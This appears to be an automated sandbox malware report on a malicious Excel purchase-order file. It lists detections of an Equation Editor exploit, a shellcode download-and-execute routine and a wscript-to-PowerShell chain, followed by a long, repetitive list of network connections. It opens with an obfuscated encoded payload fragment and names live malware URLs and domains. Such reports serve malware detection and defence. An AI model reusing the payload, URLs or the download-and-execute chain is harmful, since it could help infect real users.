/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3160, TargetFilename: C:\Users\user\AppData\Local\Temp\2env224q.jgi.ps1

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: xF3wienia PO2102559-1.xlsx

Avira: detected

Antivirus detection for URL or domain

Source: http://blessy.ydns.eu/jimbo/prnportjjm.vbs

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: uploaddeimagens.com.br	Virustotal: Detection: 6%	Perma Link
Source: https://uploaddeimagens.com.br	Virustotal: Detection: 6%	Perma Link
Source: https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820	Virustotal: Detection: 14%	Perma Link

Multi AV Scanner detection for submitted file

Source: xF3wienia PO2102559-1.xlsx	ReversingLabs: Detection: 63%
Source: xF3wienia PO2102559-1.xlsx	Virustotal: Detection: 53%			Perma Link

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 5.182.211.151 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: unknown

HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49165 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.22:49164 version: TLS 1.2

Source:	Binary string: C:\Windows\System.pdbpdbtem.pdbGAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb99 source: powershell.exe, 00000008.00000002.446551677.000000000515E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256+ source: powershell.exe, 00000008.00000002.468489304.00000000095D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.441662069.00000000041E9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.468489304.00000000095D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.441662069.00000000041E9000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0356049E ShellExecuteExW,ExitProcess,	2_2_0356049E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035604BC ExitProcess,	2_2_035604BC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035603BC LoadLibraryW,	2_2_035603BC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0356043D URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_0356043D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03560487 ShellExecuteExW,ExitProcess,	2_2_03560487

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	DNS query: name: blessy.ydns.eu
Source: global traffic	DNS query: name: pastebin.com
Source: global traffic	DNS query: name: pastebin.com
Source: global traffic	DNS query: name: pastebin.com
Source: global traffic	DNS query: name: uploaddeimagens.com.br
Source: global traffic	DNS query: name: ajai.ydns.eu
Source: global traffic	DNS query: name: ajai.ydns.eu
Source: global traffic	DNS query: name: ajai.ydns.eu
Source: global traffic	DNS query: name: ajai.ydns.eu
Source: global traffic	DNS query: name: ajai.ydns.eu

Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
